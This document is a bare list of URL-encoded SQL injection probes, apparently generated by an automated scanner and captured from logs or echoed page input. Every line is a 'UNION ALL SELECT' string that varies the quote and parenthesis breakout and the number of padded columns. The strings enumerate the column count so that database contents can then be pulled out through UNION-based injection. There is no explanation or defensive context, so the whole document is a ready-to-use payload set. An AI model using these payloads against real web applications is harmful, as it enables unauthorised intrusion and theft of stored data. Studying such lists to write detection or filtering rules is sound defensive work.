-9908%27%29%20UNION%20ALL%20SELECT%206543%2C6543%2C6543%2C6543%2C6543%2C6543%2C6543%2C6543%2C6543%2C6543%2C6543%2C6543%2C6543%2C6543%2C6543%2C6543%2C6543%2C6543%2C6543%2C6543%2C6543%2C6543%2C6543%2C6543%2C6543%2C6543%23 -9493%27%29%20UNION%20ALL%20SELECT%201862%2C1862%2C1862%2C1862%2C1862%2C1862%2C1862%2C1862%2C1862%2C1862%2C1862%2C1862%2C1862%2C1862%2C1862%2C1862%2C1862%2C1862%2C1862%2C1862%2C1862%2C1862%2C1862%2C1862%2C1862%2C1862%2C1862%23 -9268%27%29%20UNION%20ALL%20SELECT%203689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%23 -9191%27%29%20UNION%20ALL%20SELECT%209878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%23 -9918%27%29%20UNION%20ALL%20SELECT%205575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%23 -4801%27%29%29%20UNION%20ALL%20SELECT%205584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%23 -2735%27%29%29%20UNION%20ALL%20SELECT%207688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%23 -6548%27%29%29%20UNION%20ALL%20SELECT%207377%2C7377%2C7377%2C7377%2C7377%2C7377%2C7377%2C7377%2C7377%2C7377%2C7377%2C7377%2C7377%2C7377%2C7377%2C7377%2C7377%2C7377%2C7377%2C7377%2C7377%2C7377%2C7377%23 -6046%27%29%29%20UNION%20ALL%20SELECT%203065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%23 -7473%27%29%29%20UNION%20ALL%20SELECT%208158%2C8158%2C8158%2C8158%2C8158%2C8158%2C8158%2C8158%2C8158%2C8158%2C8158%2C8158%2C8158%2C8158%2C8158%2C8158%2C8158%2C8158%2C8158%2C8158%2C8158%2C8158%2C8158%2C8158%2C8158%23 -4929%27%29%29%20UNION%20ALL%20SELECT%201460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%2C1460%23 -1038%27%29%29%20UNION%20ALL%20SELECT%209282%2C9282%2C9282%2C9282%2C9282%2C9282%2C9282%2C9282%2C9282%2C9282%2C9282%2C9282%2C9282%2C9282%2C9282%2C9282%2C9282%2C9282%2C9282%2C9282%2C9282%2C9282%2C9282%2C9282%2C9282%2C9282%2C9282%23 -4472%27%29%29%20UNION%20ALL%20SELECT%207934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%23 -2368%27%29%29%20UNION%20ALL%20SELECT%203053%2C3053%2C3053%2C3053%2C3053%2C3053%2C3053%2C3053%2C3053%2C3053%2C3053%2C3053%2C3053%2C3053%2C3053%2C3053%2C3053%2C3053%2C3053%2C3053%2C3053%2C3053%2C3053%2C3053%2C3053%2C3053%2C3053%2C3053%2C3053%23 -9415%27%29%29%20UNION%20ALL%20SELECT%206493%2C6493%2C6493%2C6493%2C6493%2C6493%2C6493%2C6493%2C6493%2C6493%2C6493%2C6493%2C6493%2C6493%2C6493%2C6493%2C6493%2C6493%2C6493%2C6493%2C6493%2C6493%2C6493%2C6493%2C6493%2C6493%2C6493%2C6493%2C6493%2C6493%23 -2084%27%29%29%29%20UNION%20ALL%20SELECT%209646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%23 -8686%27%29%29%29%20UNION%20ALL%20SELECT%208121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%23 -5795%27%29%29%29%20UNION%20ALL%20SELECT%208886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%23 -7666%27%29%29%29%20UNION%20ALL%20SELECT%208254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%2C8254%23 -7621%27%29%29%29%20UNION%20ALL%20SELECT%206194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%23 -1349%27%29%29%29%20UNION%20ALL%20SELECT%201866%2C1866%2C1866%2C1866%2C1866%2C1866%2C1866%2C1866%2C1866%2C1866%2C1866%2C1866%2C1866%2C1866%2C1866%2C1866%2C1866%2C1866%2C1866%2C1866%2C1866%2C1866%2C1866%2C1866%2C1866%2C1866%23 -8261%27%29%29%29%20UNION%20ALL%20SELECT%201974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%23 -6263%27%29%29%29%20UNION%20ALL%20SELECT%205189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%23 -9000%27%29%29%29%20UNION%20ALL%20SELECT%207544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%23 -1257%27%29%29%29%20UNION%20ALL%20SELECT%209743%2C9743%2C9743%2C9743%2C9743%2C9743%2C9743%2C9743%2C9743%2C9743%2C9743%2C9743%2C9743%2C9743%2C9743%2C9743%2C9743%2C9743%2C9743%2C9743%2C9743%2C9743%2C9743%2C9743%2C9743%2C9743%2C9743%2C9743%2C9743%2C9743%23 -9729%27%20UNION%20ALL%20SELECT%205432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%23 -8121%27%20UNION%20ALL%20SELECT%206155%2C6155%2C6155%2C6155%2C6155%2C6155%2C6155%2C6155%2C6155%2C6155%2C6155%2C6155%2C6155%2C6155%2C6155%2C6155%2C6155%2C6155%2C6155%2C6155%2C6155%2C6155%23 -4490%27%20UNION%20ALL%20SELECT%207924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%23 -2430%27%20UNION%20ALL%20SELECT%208870%2C8870%2C8870%2C8870%2C8870%2C8870%2C8870%2C8870%2C8870%2C8870%2C8870%2C8870%2C8870%2C8870%2C8870%2C8870%2C8870%2C8870%2C8870%2C8870%2C8870%2C8870%2C8870%2C8870%23 -4923%27%20UNION%20ALL%20SELECT%209140%2C9140%2C9140%2C9140%2C9140%2C9140%2C9140%2C9140%2C9140%2C9140%2C9140%2C9140%2C9140%2C9140%2C9140%2C9140%2C9140%2C9140%2C9140%2C9140%2C9140%2C9140%2C9140%2C9140%2C9140%23 -9250%27%20UNION%20ALL%20SELECT%206252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%23 -4688%27%20UNION%20ALL%20SELECT%209175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%23 -3650%27%20UNION%20ALL%20SELECT%209166%2C9166%2C9166%2C9166%2C9166%2C9166%2C9166%2C9166%2C9166%2C9166%2C9166%2C9166%2C9166%2C9166%2C9166%2C9166%2C9166%2C9166%2C9166%2C9166%2C9166%2C9166%2C9166%2C9166%2C9166%2C9166%2C9166%2C9166%23 -1726%27%20UNION%20ALL%20SELECT%203670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%23 -4659%27%20UNION%20ALL%20SELECT%201336%2C1336%2C1336%2C1336%2C1336%2C1336%2C1336%2C1336%2C1336%2C1336%2C1336%2C1336%2C1336%2C1336%2C1336%2C1336%2C1336%2C1336%2C1336%2C1336%2C1336%2C1336%2C1336%2C1336%2C1336%2C1336%2C1336%2C1336%2C1336%2C1336%23 -3996%22%29%20UNION%20ALL%20SELECT%203691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%23 -6454%22%29%20UNION%20ALL%20SELECT%207868%2C7868%2C7868%2C7868%2C7868%2C7868%2C7868%2C7868%2C7868%2C7868%2C7868%2C7868%2C7868%2C7868%2C7868%2C7868%2C7868%2C7868%2C7868%2C7868%2C7868%2C7868%23 -1225%22%29%20UNION%20ALL%20SELECT%205971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%2C5971%23 -8787%22%29%20UNION%20ALL%20SELECT%204158%2C4158%2C4158%2C4158%2C4158%2C4158%2C4158%2C4158%2C4158%2C4158%2C4158%2C4158%2C4158%2C4158%2C4158%2C4158%2C4158%2C4158%2C4158%2C4158%2C4158%2C4158%2C4158%2C4158%23 -4077%22%29%20UNION%20ALL%20SELECT%209095%2C9095%2C9095%2C9095%2C9095%2C9095%2C9095%2C9095%2C9095%2C9095%2C9095%2C9095%2C9095%2C9095%2C9095%2C9095%2C9095%2C9095%2C9095%2C9095%2C9095%2C9095%2C9095%2C9095%2C9095%23 -9638%22%29%20UNION%20ALL%20SELECT%206284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%23 -3551%22%29%20UNION%20ALL%20SELECT%205853%2C5853%2C5853%2C5853%2C5853%2C5853%2C5853%2C5853%2C5853%2C5853%2C5853%2C5853%2C5853%2C5853%2C5853%2C5853%2C5853%2C5853%2C5853%2C5853%2C5853%2C5853%2C5853%2C5853%2C5853%2C5853%2C5853%23 -1210%22%29%20UNION%20ALL%20SELECT%206506%2C6506%2C6506%2C6506%2C6506%2C6506%2C6506%2C6506%2C6506%2C6506%2C6506%2C6506%2C6506%2C6506%2C6506%2C6506%2C6506%2C6506%2C6506%2C6506%2C6506%2C6506%2C6506%2C6506%2C6506%2C6506%2C6506%2C6506%23 -6937%22%29%20UNION%20ALL%20SELECT%205747%2C5747%2C5747%2C5747%2C5747%2C5747%2C5747%2C5747%2C5747%2C5747%2C5747%2C5747%2C5747%2C5747%2C5747%2C5747%2C5747%2C5747%2C5747%2C5747%2C5747%2C5747%2C5747%2C5747%2C5747%2C5747%2C5747%2C5747%2C5747%23 -9826%22%29%20UNION%20ALL%20SELECT%202642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%23 -5268%22%29%29%20UNION%20ALL%20SELECT%201416%2C1416%2C1416%2C1416%2C1416%2C1416%2C1416%2C1416%2C1416%2C1416%2C1416%2C1416%2C1416%2C1416%2C1416%2C1416%2C1416%2C1416%2C1416%2C1416%2C1416%23 -3879%22%29%29%20UNION%20ALL%20SELECT%202122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%23 -4754%22%29%29%20UNION%20ALL%20SELECT%202931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%23 -7436%22%29%29%20UNION%20ALL%20SELECT%202274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%23 -8105%22%29%29%20UNION%20ALL%20SELECT%202307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%23 -5630%22%29%29%20UNION%20ALL%20SELECT%202770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%23 -6155%22%29%29%20UNION%20ALL%20SELECT%203367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%23 -9952%22%29%29%20UNION%20ALL%20SELECT%204870%2C4870%2C4870%2C4870%2C4870%2C4870%2C4870%2C4870%2C4870%2C4870%2C4870%2C4870%2C4870%2C4870%2C4870%2C4870%2C4870%2C4870%2C4870%2C4870%2C4870%2C4870%2C4870%2C4870%2C4870%2C4870%2C4870%2C4870%23 -3187%22%29%29%20UNION%20ALL%20SELECT%207149%2C7149%2C7149%2C7149%2C7149%2C7149%2C7149%2C7149%2C7149%2C7149%2C7149%2C7149%2C7149%2C7149%2C7149%2C7149%2C7149%2C7149%2C7149%2C7149%2C7149%2C7149%2C7149%2C7149%2C7149%2C7149%2C7149%2C7149%2C7149%23 -8165%22%29%29%20UNION%20ALL%20SELECT%208448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%23 -7661%22%29%29%29%20UNION%20ALL%20SELECT%202490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%23 -6797%22%29%29%29%20UNION%20ALL%20SELECT%203892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%23 -8113%22%29%29%29%20UNION%20ALL%20SELECT%206848%2C6848%2C6848%2C6848%2C6848%2C6848%2C6848%2C6848%2C6848%2C6848%2C6848%2C6848%2C6848%2C6848%2C6848%2C6848%2C6848%2C6848%2C6848%2C6848%2C6848%2C6848%2C6848%23 -4962%22%29%29%29%20UNION%20ALL%20SELECT%205706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%23 -4005%22%29%29%29%20UNION%20ALL%20SELECT%207261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%2C7261%23 -2894%22%29%29%29%20UNION%20ALL%20SELECT%208044%2C8044%2C8044%2C8044%2C8044%2C8044%2C8044%2C8044%2C8044%2C8044%2C8044%2C8044%2C8044%2C8044%2C8044%2C8044%2C8044%2C8044%2C8044%2C8044%2C8044%2C8044%2C8044%2C8044%2C8044%2C8044%23 -9432%22%29%29%29%20UNION%20ALL%20SELECT%202879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%2C2879%23 -5890%22%29%29%29%20UNION%20ALL%20SELECT%204550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%2C4550%23 -4350%22%29%29%29%20UNION%20ALL%20SELECT%201301%2C1301%2C1301%2C1301%2C1301%2C1301%2C1301%2C1301%2C1301%2C1301%2C1301%2C1301%2C1301%2C1301%2C1301%2C1301%2C1301%2C1301%2C1301%2C1301%2C1301%2C1301%2C1301%2C1301%2C1301%2C1301%2C1301%2C1301%2C1301%23 -5555%22%29%29%29%20UNION%20ALL%20SELECT%204337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%2C4337%23 -2623%22%20UNION%20ALL%20SELECT%206961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%23 -4805%22%20UNION%20ALL%20SELECT%206211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%23 -8310%22%20UNION%20ALL%20SELECT%205832%2C5832%2C5832%2C5832%2C5832%2C5832%2C5832%2C5832%2C5832%2C5832%2C5832%2C5832%2C5832%2C5832%2C5832%2C5832%2C5832%2C5832%2C5832%2C5832%2C5832%2C5832%2C5832%23 -5024%22%20UNION%20ALL%20SELECT%202452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%2C2452%23 -2291%22%20UNION%20ALL%20SELECT%203463%2C3463%2C3463%2C3463%2C3463%2C3463%2C3463%2C3463%2C3463%2C3463%2C3463%2C3463%2C3463%2C3463%2C3463%2C3463%2C3463%2C3463%2C3463%2C3463%2C3463%2C3463%2C3463%2C3463%2C3463%23 -8694%22%20UNION%20ALL%20SELECT%206820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%23 -7239%22%20UNION%20ALL%20SELECT%208887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%23 -7036%22%20UNION%20ALL%20SELECT%209845%2C9845%2C9845%2C9845%2C9845%2C9845%2C9845%2C9845%2C9845%2C9845%2C9845%2C9845%2C9845%2C9845%2C9845%2C9845%2C9845%2C9845%2C9845%2C9845%2C9845%2C9845%2C9845%2C9845%2C9845%2C9845%2C9845%2C9845%23 -3186%22%20UNION%20ALL%20SELECT%208793%2C8793%2C8793%2C8793%2C8793%2C8793%2C8793%2C8793%2C8793%2C8793%2C8793%2C8793%2C8793%2C8793%2C8793%2C8793%2C8793%2C8793%2C8793%2C8793%2C8793%2C8793%2C8793%2C8793%2C8793%2C8793%2C8793%2C8793%2C8793%23 -8049%22%20UNION%20ALL%20SELECT%202888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%23 -5628%22%29%20UNION%20ALL%20SELECT%202123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%23 -8430%22%29%20UNION%20ALL%20SELECT%202129%2C2129%2C2129%2C2129%2C2129%2C2129%2C2129%2C2129%2C2129%2C2129%2C2129%2C2129%2C2129%2C2129%2C2129%2C2129%2C2129%2C2129%2C2129%2C2129%2C2129%2C2129%23 -3292%22%29%20UNION%20ALL%20SELECT%202620%2C2620%2C2620%2C2620%2C2620%2C2620%2C2620%2C2620%2C2620%2C2620%2C2620%2C2620%2C2620%2C2620%2C2620%2C2620%2C2620%2C2620%2C2620%2C2620%2C2620%2C2620%2C2620%23 -7655%22%29%20UNION%20ALL%20SELECT%207033%2C7033%2C7033%2C7033%2C7033%2C7033%2C7033%2C7033%2C7033%2C7033%2C7033%2C7033%2C7033%2C7033%2C7033%2C7033%2C7033%2C7033%2C7033%2C7033%2C7033%2C7033%2C7033%2C7033%23 -5983%22%29%20UNION%20ALL%20SELECT%207635%2C7635%2C7635%2C7635%2C7635%2C7635%2C7635%2C7635%2C7635%2C7635%2C7635%2C7635%2C7635%2C7635%2C7635%2C7635%2C7635%2C7635%2C7635%2C7635%2C7635%2C7635%2C7635%2C7635%2C7635%23 -4533%22%29%20UNION%20ALL%20SELECT%202528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%23 -5137%22%29%20UNION%20ALL%20SELECT%201469%2C1469%2C1469%2C1469%2C1469%2C1469%2C1469%2C1469%2C1469%2C1469%2C1469%2C1469%2C1469%2C1469%2C1469%2C1469%2C1469%2C1469%2C1469%2C1469%2C1469%2C1469%2C1469%2C1469%2C1469%2C1469%2C1469%23 -5808%22%29%20UNION%20ALL%20SELECT%207745%2C7745%2C7745%2C7745%2C7745%2C7745%2C7745%2C7745%2C7745%2C7745%2C7745%2C7745%2C7745%2C7745%2C7745%2C7745%2C7745%2C7745%2C7745%2C7745%2C7745%2C7745%2C7745%2C7745%2C7745%2C7745%2C7745%2C7745%23 -2506%22%29%20UNION%20ALL%20SELECT%206850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%23 -5059%22%29%20UNION%20ALL%20SELECT%207074%2C7074%2C7074%2C7074%2C7074%2C7074%2C7074%2C7074%2C7074%2C7074%2C7074%2C7074%2C7074%2C7074%2C7074%2C7074%2C7074%2C7074%2C7074%2C7074%2C7074%2C7074%2C7074%2C7074%2C7074%2C7074%2C7074%2C7074%2C7074%2C7074%23 -4787%22%29%29%20UNION%20ALL%20SELECT%202496%2C2496%2C2496%2C2496%2C2496%2C2496%2C2496%2C2496%2C2496%2C2496%2C2496%2C2496%2C2496%2C2496%2C2496%2C2496%2C2496%2C2496%2C2496%2C2496%2C2496%23 -4252%22%29%29%20UNION%20ALL%20SELECT%201710%2C1710%2C1710%2C1710%2C1710%2C1710%2C1710%2C1710%2C1710%2C1710%2C1710%2C1710%2C1710%2C1710%2C1710%2C1710%2C1710%2C1710%2C1710%2C1710%2C1710%2C1710%23 -7368%22%29%29%20UNION%20ALL%20SELECT%206031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%23 -4339%22%29%29%20UNION%20ALL%20SELECT%208280%2C8280%2C8280%2C8280%2C8280%2C8280%2C8280%2C8280%2C8280%2C8280%2C8280%2C8280%2C8280%2C8280%2C8280%2C8280%2C8280%2C8280%2C8280%2C8280%2C8280%2C8280%2C8280%2C8280%23 -2928%22%29%29%20UNION%20ALL%20SELECT%201619%2C1619%2C1619%2C1619%2C1619%2C1619%2C1619%2C1619%2C1619%2C1619%2C1619%2C1619%2C1619%2C1619%2C1619%2C1619%2C1619%2C1619%2C1619%2C1619%2C1619%2C1619%2C1619%2C1619%2C1619%23 -6092%22%29%29%20UNION%20ALL%20SELECT%203708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%23 -6769%22%29%29%20UNION%20ALL%20SELECT%201760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%23 -6432%22%29%29%20UNION%20ALL%20SELECT%209099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%23 -5658%22%29%29%20UNION%20ALL%20SELECT%206874%2C6874%2C6874%2C6874%2C6874%2C6874%2C6874%2C6874%2C6874%2C6874%2C6874%2C6874%2C6874%2C6874%2C6874%2C6874%2C6874%2C6874%2C6874%2C6874%2C6874%2C6874%2C6874%2C6874%2C6874%2C6874%2C6874%2C6874%2C6874%23 -2427%22%29%29%20UNION%20ALL%20SELECT%204190%2C4190%2C4190%2C4190%2C4190%2C4190%2C4190%2C4190%2C4190%2C4190%2C4190%2C4190%2C4190%2C4190%2C4190%2C4190%2C4190%2C4190%2C4190%2C4190%2C4190%2C4190%2C4190%2C4190%2C4190%2C4190%2C4190%2C4190%2C4190%2C4190%23 -5947%22%29%29%29%20UNION%20ALL%20SELECT%203432%2C3432%2C3432%2C3432%2C3432%2C3432%2C3432%2C3432%2C3432%2C3432%2C3432%2C3432%2C3432%2C3432%2C3432%2C3432%2C3432%2C3432%2C3432%2C3432%2C3432%23 -5972%22%29%29%29%20UNION%20ALL%20SELECT%202411%2C2411%2C2411%2C2411%2C2411%2C2411%2C2411%2C2411%2C2411%2C2411%2C2411%2C2411%2C2411%2C2411%2C2411%2C2411%2C2411%2C2411%2C2411%2C2411%2C2411%2C2411%23 -3783%22%29%29%29%20UNION%20ALL%20SELECT%206697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%23 